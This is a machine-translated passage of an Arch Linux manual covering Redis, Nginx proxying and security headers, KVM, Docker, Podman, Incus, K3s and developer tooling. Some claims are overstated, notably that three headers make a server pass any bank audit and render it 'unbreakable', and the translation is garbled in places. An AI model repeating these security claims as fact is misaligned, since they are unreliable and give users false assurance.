14.5.2 Integration (Object Cache)

If you use PHP, you must install the communication module:

sudo pacman -S php-redis

In your web application (e.g., WordPress), you install an Object Cache plugin and tell it to point to 127.0.0.1:6379(the default port for Redis). From that point on, your website's loading times will drop from 800ms to 40ms.

Redis also requires an eviction policy. If you have 2GB of RAM allocated to Redis and it fills up, what happens? Edit /etc/redis/redis.confand configure:

maxmemory 2gb
maxmemory-policy allkeys-lru

(LRU = Least Recently Used. It will delete data that hasn't been visited for a long time, keeping the cache fresh and preventing the server from crashing).

14.6 Advanced Reverse Proxy and Load Balancing ↑ Home

As we explored in Chapter 14.1, Nginx is capable of routing requests to PHP-FPM, but its true corporate power lies in acting as a reverse proxy . Imagine you have a Node.js application running on port 3000, a Python API (FastAPI) running on the 8000and three Docker containers running database servers. You don't want to open all those ports to the world. You want Nginx to intercept everything on port 443 (secure HTTPS) and distribute the traffic logically.

14.6.1 Proxy Pass Configuration

Open the server block settings ( /etc/nginx/nginx.conf):

server {
    listen 443 ssl http2;
    server_name api.mi-sitio-web.com;

    # Certificados gestionados por Certbot (Capítulo 14.4)
    ssl_certificate /etc/letsencrypt/live/api.mi-sitio-web.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/api.mi-sitio-web.com/privkey.pem;

    location / {
        proxy_pass http://127.0.0.1:3000;
        
        # Estas cabeceras son CRÍTICAS. Sin ellas, la app Node.js pensará que la visita viene
        # del propio servidor (127.0.0.1) en lugar de la IP real del usuario de internet.
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}

14.6.2 Load Balancing

If your Node.js application on port 3000 becomes overloaded, you can run three copies of the same application on ports 3001, 3002, and 3003. Nginx can mathematically distribute the traffic among the three (Round-Robin algorithm) so that your server handles three times the load.

Add the block upstreamOUTSIDE the block server:

upstream mi_app_node {
    server 127.0.0.1:3001;
    server 127.0.0.1:3002;
    server 127.0.0.1:3003;
}

And then, instead of routing to a static IP, you route to the group:

proxy_pass http://mi_app_node;

14.6.3 Military Security Headers

A misconfigured web server allows cross-site scripting (XSS) and iframe hijacking attacks. In Nginx, always inject these headers into your main block:

# HSTS: Fuerza a los navegadores a recordar que tu sitio SÓLO funciona con HTTPS.
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# Impide que otras webs incrusten tu página dentro de las suyas (Anti-Clickjacking).
add_header X-Frame-Options "SAMEORIGIN";
# Bloquea que los navegadores adivinen el tipo de archivo, mitigando ataques de scripts ocultos.
add_header X-Content-Type-Options "nosniff";

With these additions, your LEMP infrastructure (Linux, Nginx, MariaDB, PHP/Node/Redis) will pass any modern bank security audit or pentesting stress test, turning your Arch machine into an unbreakable web production bunker.

Chapter 15: Virtualization, Passthrough, and Containers ↑ Home

Modern computing is the science of deceiving the hardware. We deceive an operating system into believing it possesses a physical machine (virtualization), or we deceive an application into believing it is the sole occupant of memory (containers). As a power user of Arch, you rarely compile code on your host system for fear of cluttering your precious installation with thousands of orphaned dependencies. For risky testing, web deployments, or crazy builds, isolated environments are used.

15.1 The Era of the Type 1 Hypervisor: KVM and libvirt ↑ Home

There are Type 2 hypervisors, such as VirtualBox or VMware Player. These run like a normal program (just like a web browser) in user space, which adds a massive layer of latency in interpreting commands from the disk and CPU.

In Linux, we use a Type 1 hypervisor called KVM (Kernel-based Virtual Machine) . Because it's physically embedded in the system kernel, KVM turns Arch Linux itself into a bare-metal hypervisor with only a 2% performance degradation. We use QEMU to emulate motherboards, networks, and peripherals, and the libvirt API to orchestrate this chaos.

15.1.1 Installation of the Virtualization Ecosystem

sudo pacman -S qemu-desktop libvirt edk2-ovmf virt-manager dnsmasq

• edk2-ovmfIt's the open-source UEFI firmware. Without it, your virtual machines wouldn't be able to use GPT disks and would be stuck simulating machines from 2005.
• virt-managerA GTK graphical interface tool that abstracts all the painful XML commands of libvirt, giving you a "VirtualBox" experience on steroids.

Add your username to the group libvirtto avoid typing passwords every 2 minutes and starts the central daemon:

sudo usermod -aG libvirt francesc
sudo systemctl enable --now libvirtd.service

15.1.2 VFIO PCI Passthrough (The Holy Grail of VM Gaming)

(Advanced Theory) One of KVM's most impressive technical achievements is PCI Passthrough . If you have two graphics cards in your desktop PC (for example, an integrated Intel card and a discrete NVIDIA RTX card), you can bind the NVIDIA card through your motherboard's IOMMU pool and physically inject it into your Windows 11 virtual machine. The result is an Arch Linux operating system running on the integrated graphics on monitor 1, and a Windows virtual machine running on monitor 2, using the official NVIDIA Windows drivers, achieving 99% native gaming performance. Windows 11 has no way of knowing it's virtualized and believes it's the rightful owner of the RTX silicon. (This process requires modifying kernel IOMMU boot parameters and complex VFIO isolations.)

15.2 Container Architecture: Docker ↑ Home

Virtual Machines (VMs) simulate the motherboard, install their own kernel (e.g., 2GB of Windows), boot from their own hard drive, etc. They consume a lot of RAM and take 30 seconds to boot. Containers are a technology exclusive to the Linux kernel. They use cgroups(control of CPU/RAM groups) and namespaces(Network isolation, users) to trick the process. A container running a web server (Nginx) and database (PostgreSQL) shares the EXACT SAME KERNEL as your Arch Linux. The container weighs only 30 megabytes (because it doesn't contain an operating system, only system binaries and libraries), boots in 0.2 seconds (because the kernel is already running), and consumes the same amount of RAM as a normal process. It's alien-level efficient engineering.

15.2.1 The Docker Ecosystem and the Daemon

sudo pacman -S docker docker-compose

Docker uses a client-server architecture. The client is the terminal command, but the server is a gigantic process. dockerd) which runs as root in the background to orchestrate the network and storage magic.

sudo systemctl enable --now docker.service
sudo usermod -aG docker francesc

(Log out and log back in. IMPORTANT: On Linux, be in the group dockerThis is technically equivalent to having unrestricted root privileges. A malicious user could create a container and mount the disk. /dev/nvmecomplete within it).

15.2.2 Images, Containers and Compositions

In Docker, the read-only template is called an Image , which you download from a global repository (Docker Hub). When you tell Docker to "run" that image, Docker clones the template and creates a volatile writable layer on top, calling it a Container .

A quick command to run clean Ubuntu inside your Arch Linux without installing Ubuntu:

docker run -it ubuntu /bin/bash

The real infrastructure (Docker Compose): In a real development environment, we don't use long, isolated commands. We describe the infrastructure in a declarative YAML file, and the computer runs it. For example, if you need to test the new version of Ghost CMS (a WordPress competitor) and don't want to clutter your system with strange Node.js or MariaDB packages, you create a file docker-compose.ymlin an empty folder:

version: '3.1'
services:
  ghost:
    image: ghost:latest
    ports:
      - "8080:2368" # Mapea tu puerto 8080 local al puerto 2368 del contenedor
    environment:
      database__client: mysql
      database__connection__host: db
      database__connection__user: root
      database__connection__password: contraseña_secreta
      database__connection__database: ghost
  db:
    image: mysql:8.0
    environment:
      MYSQL_ROOT_PASSWORD: contraseña_secreta

You run it from the folder:

docker-compose up -d

In about 5 seconds, Docker downloads both images, creates an isolated virtual network, starts MySQL, waits for it to respond, starts the CMS manager, and maps your port. You're going to localhost:8080in your browser, and your complex web server is live. When you're finished, you run docker-compose downand the system, databases, and configurations evaporate into thin air, leaving your Arch Linux completely pristine.

15.3 Safe Evolution: Podman (Daemonless and Rootless) ↑ Home

Red Hat identified three severe vulnerabilities in the Docker architecture (and replaced them in OpenShift, its enterprise Kubernetes orchestrator):

1. Daemon Dependency (SPOF - Single Point of Failure): If the process dockerd(the central server) freezes and crashes, ALL your thousands of containers shut down simultaneously, destroying the server.
2. Root Security: The daemon must always run as superuser, opening up a huge range of exploits (escapes from the container to the host machine).
3. Not Systemd friendly: Because it cannot interact well with the startup system, managing containers to start when the PC turns on is complicated natively.

The answer is Podman . Podman has no central server (Daemonless). And most importantly, Podman allows your standard user ( francesc) run, download, and build complex containers within normal user space without using ANY superuser permissions (Rootless Containers). If malware breaks into the Podman container, it will only encounter standard user permissions.

15.3.1 Installation and Migration

sudo pacman -S podman podman-compose

The transition from Docker to Podman is designed to be seamless. The engineers cloned the exact same commands. In fact, the official manual suggests a trick in your shell ( ~/.bashrc):

alias docker=podman
alias docker-compose=podman-compose

As I write this, your old automated work scripts for docker run ...They will surreptitiously summon Podman.

Podman also has the superpower of exporting the state of a container to the native language of systemd ( .service), allowing you to inject your infrastructure directly into the operating system runlevels without third-party daemons interfering, achieving absolute stability of the Arch Linux system you built.

15.4 Lightweight Virtualization (LXC / LXD) ↑ Home

While Docker and Podman (Chapter 15.2) are designed under the "One Process Per Container" philosophy (i.e., you set up one Docker just to run Nginx, and another Docker just to run the database), there is another paradigm: System Containers.

Linux Containers (LXC) and its highly advanced manager LXD/Incus allow you to create containers that behave exactly like Virtual Machines (they have their own systemd, their own startup process, install cron jobs, and run multiple applications), but using your underlying Arch Linux kernel. There is no CPU emulation (KVM) or hypervisor.

15.4.1 Initializing the Incus Ecosystem

LXD was maintained by Canonical (Ubuntu), but after a closed license change, the Linux community made a fork (Incus) which is the current standard adopted by Arch Linux.

sudo pacman -S incus
sudo systemctl enable --now incus.service

You must add your user to the group incus-adminand configure the daemon by answering the interactive questions (allocate a ZFS or Btrfs disk block, and create a virtual network bridge):

sudo usermod -aG incus-admin francesc
sudo incus admin init

15.4.2 Launch of Complete Systems

To launch a container with Alpine Linux, Debian, or even another copy of Arch Linux inside your host in less than 1 second:

incus launch images:archlinux/current maquina-arch-2

To log in as root to that machine (which will have its own internal IP, its own firewall, and its own daemons):

incus exec maquina-arch-2 -- bash

This architecture is used by hosting companies (VPS) to rent you cheap "Dedicated Servers". They are renting you an LXC container that, to you, is indistinguishable from a physical machine.

15.5 Large-Scale Orchestration: Kubernetes (K3s) ↑ Home

When you have 100 Docker containers spread across 5 different physical servers, Docker Compose falls short. If Server 1 physically fails, Docker doesn't know how to automatically restart the lost containers on Server 2.

Kubernetes (K8s) is the undisputed standard for cloud orchestration (invented by Google). It's an operational intelligence system that ensures your applications maintain their desired state regardless of hardware chaos. Installing pure Kubernetes—"K8s The Hard Way"—requires a whole book, but Rancher Labs created K3s , a certified hyper-lightweight distribution that eliminates legacy code, perfect for installation on a single Arch Linux node or a Raspberry Pi cluster.

15.5.1 Installation of K3s (Master Node)

K3s uses containerd (Docker's sub-engine) and comes in a single binary. On Arch, it can be installed from the AUR:

yay -S k3s-bin

We enabled the service as a Server Node (Master/Control Plane):

sudo systemctl enable --now k3s.service

To be able to use the client tool ( kubectlWithout being root, we copy the cluster's cryptographic configuration file:

mkdir ~/.kube
sudo cp /etc/rancher/k3s/k3s.yaml ~/.kube/config
sudo chown francesc:francesc ~/.kube/config

15.5.2 K8 Concepts: Pods and Ingress

With K3s up and running, you no longer communicate with individual containers. You communicate in "Declarations." You send a YAML file to the master server.

A file despliegue.yamlclassic on K8s:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: mi-web-escalable
spec:
  replicas: 3 # ¡Magia! K8s levantará 3 copias y las mantendrá vivas
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: nginx-contenedor
        image: nginx:latest
        ports:
        - containerPort: 80

You apply the infrastructure:

kubectl apply -f despliegue.yaml

You will see 3 "Pods" (capsules containing your Docker containers) appear. If you use the command kubectl delete pod [nombre]By emulating a catastrophic failure, you will see that the K3s orchestrator, in less than a second, realizes that replicas are missing, and starts a new container to compensate automatically.

K3s also includes Traefik , an Ingress controller (an intelligent router that does the same reverse proxy work as Nginx, Chapter 14, but dynamically and automatically as containers are born and die).

With Kubernetes running on your local machine, your Arch Linux computer becomes a cloud-native development platform. You write code, package it into a container, and deploy it to your local Kubernetes, ensuring that when you upload it to massive clusters on Amazon AWS or Google Cloud, it will perform mathematically the same.

Chapter 16: The Art of Software Development (The Developer's Arch) ↑ Home

You've climbed a massive technical mountain. Installing and hardening Arch Linux is a unique learning process that not many professionals undertake, and if you've completed it, you have a hyper-agile system at your command. Arch Linux is, without a doubt, the perfect machine for software engineers, programmers, and data scientists.

In a user-friendly distribution like Ubuntu, if you need the version v20.xWith NodeJS or the C++20 compiler, you rely on third-party PPA repositories maintained by dubious Launchpad accounts. In Arch, everything is in your repositories as soon as those companies' code matures. In this chapter, we'll secure our environments to program safely and without corrupting the underlying system.

16.1 The Philosophy of Isolated Environments (Logical Sandboxing) ↑ Home

The first rule of development in Rolling Release systems : Never install libraries or global language dependencies using external managers such as pip(Python), npm(Node), o cargo(Rust) by order sudoIf you do this, the generic package manager (pip) will overwrite files in /usr/lib/without pacmanKnow this. Months later, pacman will try to install something there and crash the system with an irreconcilable conflict error. Environment Managers are always used.

16.1.1 Python Ecosystem (Venv and PEP-668)

Python is very closely tied to Arch Linux itself (many native AUR tools use it). If you try to do sudo pip install requestsArch will kick you out with a red alert from the PEP-668 protocol informing you that the environment is "Externally Managed" (managed by pacman).

To program safely in Python:

1. Install VirtualEnv:

    sudo pacman -S python-pip python-virtualenv

1. Create the microclimate for your project:

When starting a project, create its own environment contained locally in the project folder.

    mkdir mi_proyecto_backend && cd mi_proyecto_backend
    python -m venv .venv

1. Activate the Environment (The Source):

    source .venv/bin/activate

Your prompt will change. From now on, everything you install (e.g. pip install Django) will be trapped in the hidden folder .venvand will be ignored by the general system.

16.1.2 Ecosistema JavaScript/TypeScript (NVM y Node)

Frontend development changes incredibly fast. Many legacy projects you collaborate on will require older versions (e.g., NodeJS v14 for a legacy project, NodeJS v22 for your modern app). Install the static package nodejsPacman will ruin your life by limiting you to only one version.

The enterprise standard is to use Node Version Manager (NVM) . As an external script, it resides in the AUR.

yay -S nvm

You must inject (source) the NVM environment at the startup of your interactive console (for example ~/.bashrcthe ~/.zshrc).

echo 'source /usr/share/nvm/init-nvm.sh' >> ~/.bashrc
source ~/.bashrc

Control time:

• To download the latest LTS version recommended for production: nvm install --lts
• To download the old version 16: nvm install 16
• To instantly switch versions: nvm use 16
• All global NPM facilities (e.g. npm install -g yarn) will be safely isolated within a local hidden folder ( ~/.nvm/).

16.1.3 C/C++ Ecosystem and Rust (The Trendy Language)

Rust is fundamental because a huge number of native Arch tools are being rewritten in Rust (even parts of the modern Linux kernel). Just like NVM with Node, Rust has Rustup .

sudo pacman -S rustup
rustup default stable

(This downloads and initializes the compiler binaries) rustcand the amazing dependency manager cargoin the folder ~/.cargo/).

To program in C/C++, you should already have the essential installer package for compiling things from the AUR, which provides you with the glorious GCC compiler and Make:

# Ya los tienes si seguiste la guía, añadimos las herramientas de debug.
sudo pacman -S base-devel gdb clang cmake

Clang and CMake are the winning pair for instantly compiling C++ in modern IDEs.

16.2 Version Control: Git at the SysAdmin Level ↑ Home

You're a programmer. You need Git as much as you need oxygen.

sudo pacman -S git

Asymmetric Authentication (Goodbye Web Tokens): Cloning private repositories from GitHub/GitLab using HTTPS requires typing cumbersome personal access tokens that expire. The hacker approach is to use the SSH key you generated in Chapter 13. Go to GitHub on the web -> Settings -> SSH and GPG keys -> New SSH Key. Paste the public content of your terminal-generated key there:

cat ~/.ssh/id_ed25519.pub

Now you can magically clone code without passwords using the SSH protocol URL of the repositories: git clone git@github.com:torvalds/linux.git

Improvements (Aliases of the .gitconfig dotfile): Git configuration is stored in your home directory. Use these commands to color-code the interface and force the log command to draw an ASCII graph of the version tree:

git config --global user.name "Tu Apellido"
git config --global user.email "developer@empresa.com"
git config --global color.ui auto
git config --global init.defaultBranch main
git config --global core.editor "nano"

# El super-alias de visualización de ramas:
git config --global alias.tree "log --graph --decorate --pretty=oneline --abbrev-commit"

Now, as I write git treeYou'll see the entire branched repository history in glorious colors.

16.3 Integrated Editing Environments (IDEs and Editors) ↑ Home

A master carpenter respects his tools. Choosing an editor on Linux (and Arch) is almost a religion. You have two predominant philosophies: Extensive usability based on a graphical interface (VSCode) and the relentless minimalism of the keyboard-dominated terminal (Neovim).

16.3.1 Visual Studio Code: Beware of Telemetry

It's undeniable that VS Code is the current champion. However, the binary file distributed by Microsoft contains silent telemetry (it collects your usage metrics) and closed, proprietary licenses.

As an Arch Linux user, you have access to Code OSS (Open Source Software), which is exactly the same program, built directly from source code by the Arch community, without Microsoft's invasive privacy insertions (Telemetry removed).

# La versión pura y libre en los repos oficiales
sudo pacman -S code

• Practical Problem: Since this free version does not pay licenses to Microsoft, due to legal policies, Microsoft prohibits you from connecting to its official extensions "Marketplace", forcing you to use the free marketplace (OpenVSX).
• Solution (If you need Microsoft's proprietary extensions, e.g., Remote-SSH or Pylance): You need to install the official proprietary build available in the AUR:

    yay -S visual-studio-code-bin

16.3.2 Neovim: The UNIX Developer Editor (Terminal)

Neovim is not just an update of vimIt's a massive rewrite of its core that allows it to run asynchronously and, above all, use the LUA language to write ultra-fast configurations, achieving static code analyzers (LSP - Language Server Protocols, the engine behind VSCode) directly integrated into your console.

sudo pacman -S neovim

If you run nvimThe learning curve is monumental (you can't even navigate the text without knowing that 'j' goes down, 'k' goes up, and exiting requires the command :wqTo enjoy the power of an IDE without configuring it for a month straight, install a community-maintained distribution of neovim, which turns the sterile console into a spectacular visual editor in 30 seconds by injecting hundreds of lua scripts (extreme Ricing).

Example Neovim Distribution: NvChad Make sure your Nerd Fonts are correctly installed (Chapter 7) and run:

# Haz una copia de seguridad por si tenías config previa
mv ~/.config/nvim ~/.config/nvim.bak
# Descarga el framework ultra rápido NvChad
git clone https://github.com/NvChad/starter ~/.config/nvim
# Ábrelo por primera vez para que él mismo compile sus plugins:
nvim

You'll be amazed to see that inside your old black terminal lives a fluid IDE with millisecond autocompletion, C++ parsing, and a tree-style file explorer, using 2% of the RAM that VS Code would require.

16.4 End of Path (System Conclusion) ↑ Start

It's been a long journey through the intricacies of hardware and software. We started in a black terminal with a blinking UEFI boot error. We formatted blocks, mounted blind partitions, chrooted our consciousness into the system's brain, and built the base universe with pacstrap.

Next, we built the skeleton, equipping it with muscles (custom TKG kernel, C++ optimization flags -march=native), a nervous system (NetworkManager and PipeWire), and an unbreakable titanium frame (AppArmor, LUKS, and UFW). Finally, we gave it vision and life with Wayland, composing crystalline and fluid art thanks to Hyprland and our obsessive Ricing work, culminating in the forging of isolated Docker and Python environments to transform the machine into the production workstation of any engineer's dreams.

You've mastered the fundamental architecture of the world's most malleable operating system, learned commands that technical manuals assume you already know, and understood the theory behind why things sometimes break. The distribution won't fail on its own. You have complete control over every package. Arch Linux doesn't assume you're an idiot; it assumes you are, or will become, an elite software professional.

Welcome. The manual is never-ending. In fact, it's always up-to-date on the Arch Wiki. Good luck.

16.4 Modern Compiled Languages ​​and Debugging (Go and Rust) ↑ Home

Beyond C/C++ and interpreted languages ​​like Python, Arch Linux is a paradise for modern systems developers (Backend and CLI), where languages ​​like Go (Golang) and Rust dominate the Cloud Computing market.

16.4.1 El Ecosistema Golang

Unlike NodeJS or Python, Go's compiler is incredibly static and generates self-contained, monolithic binaries. You can install the latest version directly with pacman without fear of breaking your system (Go doesn't use shared C dependencies).

sudo pacman -S go

Historically, Go required a strict folder hierarchy called GOPATH(typically ~/goToday, thanks to "Go Modules", you can start a project in any corner of your hard drive:

mkdir mi_api_go && cd mi_api_go
# Inicializa el rastreador de módulos apuntando a tu futuro repositorio
go mod init github.com/francesc/mi_api_go

To compile a Go program on Arch Linux and instruct the compiler to cross-compile it so that it runs on an older 32-bit Windows server, the command is absurdly simple thanks to the native toolchain:

GOOS=windows GOARCH=386 go build -o mi_programa.exe

16.4.2 Deep Cleaning (GDB and Delve)

Write code with print()Finding errors is for amateurs. Software engineers use debuggers. A debugger freezes the program in RAM at the exact moment a fault occurs (or at a "breakpoint" you set), allowing you to inspect the variables internally.

• is used . For C/C++ and Rust, GDB (GNU Debugger) or LLDB (from the LLVM project)

    sudo pacman -S gdb lldb

• For Go, the compiler applies so many optimizations that GDB gets overwhelmed. The industry standard, funded by Google, is Delve .

    sudo pacman -S delve

To catch a bug in your Go program, instead of running go run, you start the debugger:

dlv debug main.go

In the Delve console, you can type break main.go:25(stop at line 25), then continueThe code will advance at the speed of light and magically pause on line 25. You will be able to write print miVariableto view its live content, discovering why your software was failing.

16.4.3 Extreme Performance Profiling (Perf)

If your program is bug-free but runs slowly, and you don't know which function in your code is slowing down execution, you use the Kernel Profiler: Perf . Perf reads the hardware performance counters within the silicon of your processor (Intel/AMD).

sudo pacman -S perf
# Perfila el programa durante 10 segundos
sudo perf record -g ./mi_programa_lento
# Lee el reporte
sudo perf report

The terminal will display a hierarchical tree revealing that, for example, 45% of your program's CPU time is lost in a cycle forThis error is specific to line 104 and is due to L1 cache misses. It's an atomic-level X-ray of your software.

16.5 Local Continuous Integration (CI/CD) and Git Hooks ↑ Home

Professional development dictates that no code should be deployed to the production server (GitLab/GitHub) without first undergoing a battery of automated tests and static analysis. In a company, these CI/CD processes run in the cloud and consume valuable server time.

On your Arch Linux system, you can emulate the entire cloud infrastructure locally, avoiding uploading broken code.

16.5.1 Git Hooks (The security barrier of commits)

Git Hooks are hidden bash scripts within your repository ( .git/hooks/) that Git executes automatically when you try to perform actions. The most important is the pre-commit . If the script returns an error (Exit Code 1), Git will abort your command git commitand it will prohibit you from saving the code, forcing you to fix it.

In modern projects (e.g., Python or JavaScript), instead of writing bash scripts by hand, the pre-commit manager (written in Python) is used:

sudo pacman -S pre-commit

In the root of your project, you create a file .pre-commit-config.yaml:

repos:
-   repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.4.0
    hooks:
    -   id: trailing-whitespace # Elimina espacios vacíos al final
    -   id: end-of-file-fixer   # Asegura un salto de línea al final
    -   id: check-yaml          # Asegura que tus archivos YAML no estén rotos

You install the barriers with the command: pre-commit installThe next time you write git commit -m "Mi cambio"The system will stop the clock, run local tests, fix the code if it's dirty, and only if everything passes, will it create the version.

16.5.2 GitHub Actions en Local (Act)

Si configuras GitHub Actions ( .github/workflows/main.ymlTo have Docker containers launch and test your database every time you "push," you typically have to upload the code, wait 5 minutes on the GitHub website, and see if it fails. If it fails, you correct a comma, upload again, and wait another 5 minutes.

The Act tool reads your YAML file from GitHub, and using your local Docker daemon (Chapter 15), it brings up the virtual Ubuntu images from GitHub inside your own Arch Linux computer , running all the tests in seconds.

It is installed via the AUR (since it is programmed in Go):

yay -S act

If you are in your project folder and simply type actThe program will download a 3GB Ubuntu container that simulates the Microsoft/GitHub server, inject your code, and run the tests (e.g. npm run testthe pytest). If the test fails in actLocally, it will fail in the cloud. When using actYou accelerate the feedback loop from hours to minutes, developing at a ferocious speed.

16.6 Final Reflection ↑ Start

You've completed your master's degree. Your Arch Linux isn't just an operating system where you consume content; it's a cybersecurity lab, a server cluster, a cryptographic assembly station, and a cloud orchestration platform. You are the undisputed architect of your own computational domains. May your code always compile on the first pass, and may your system never suffer a kernel panic.